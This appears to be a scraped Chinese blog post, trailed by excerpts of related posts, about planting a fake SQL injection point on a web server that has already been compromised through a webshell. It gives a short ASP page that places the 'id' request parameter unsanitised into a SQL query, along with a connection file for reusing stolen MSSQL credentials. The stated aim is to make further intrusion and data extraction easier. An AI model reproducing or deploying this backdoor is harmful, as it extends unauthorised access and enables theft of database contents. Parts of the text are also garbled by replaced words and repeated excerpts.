自己構造注入點方便入侵

2021-09-23 17:04:27 字數 1240 閱讀 3579

自己構造注入點方便入侵

今天看了rootkit論壇裡面有人要我寫出來關於偽造乙個注入點,然後方便滲透,找到更多的可利用的資訊

這兩天一直考試,想了下,就先仍出來,有什麼問題可以提出來,我們一起討論!

首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和

因為我測試的時候是用管理員的表,我朋友說任何表名都可以,只要這個表存在,**如下:

程式**

<%

set rs=server.createobject(「adodb.recordset」)

id = request(「id」)

strsql = 「select * from admin where id=」 & id

rs.open strsql,conn,1,3

rs.close

%>

把strsql = 「select * from admin where id=」 & id 這句話裡面的admin換成要偽造的表名,注意必須存在

你可以連線上去看下表名就是了!這裡假設的是admin是表名!這個檔名隨便儲存!

然後就要構造乙個連線資料庫的檔案了,**如下:

程式**

<%

strsqlservername = 「000.000.000.000」 '伺服器名稱或位址

strsqldbusername = 「sqlname」 '資料庫帳號

strsqldbpassword = 「sqlpass」 '資料庫密碼

strsqldbname = 「sqldataname」 '資料庫名稱

set conn = server.createobject(「adodb.connection」)

strcon = 「provider=sqloledb.1;persist security info=false;server=」 & strsqlservername & 「;user id=」 & strsqldbusername & 「;password=」 & strsqldbpassword & 「;database=」 & strsqldbname & 「;」

conn.open strcon

%>

這裡應該都會了,就不羅嗦了,不過注意的是儲存的檔名要和include呼叫的名字一樣。。還是羅嗦話,

就這樣,正常情況下,就ok了,偽造成功⋯⋯

如果有什麼問題可以提出來大家一起**解決。

自己構造注入點方便入侵

首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和 因為我測試的時候是用管理員的表,我朋友說任何表名都可以,只要這個表存在,如下 程式 set rs server.createobject adodb.recordset id r...

自己構造注入點

一種是通過conn.asp獲知資料庫帳戶密碼以後 自己構造,另乙個是通過搜尋檢視源 構造注入點。第一種 適用條件 已經獲得 的資料庫鏈結檔案,但不是sa許可權 當然如果是mdb資料庫那就很簡單了,直接下下來就ok了,這裡只是針對mssql資料庫而言 由於入侵 並沒有注入漏洞所以,無法注入,但是我們可...

自己偽造注入點方便滲透

今天看了rootkit論壇裡面有人要我寫出來關於偽造乙個注入點,然後方便滲透,找到更多的可利用的資訊 這兩天一直考試,想了下,就先仍出來,有什麼問題可以提出來,我們一起討論!首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和 密碼...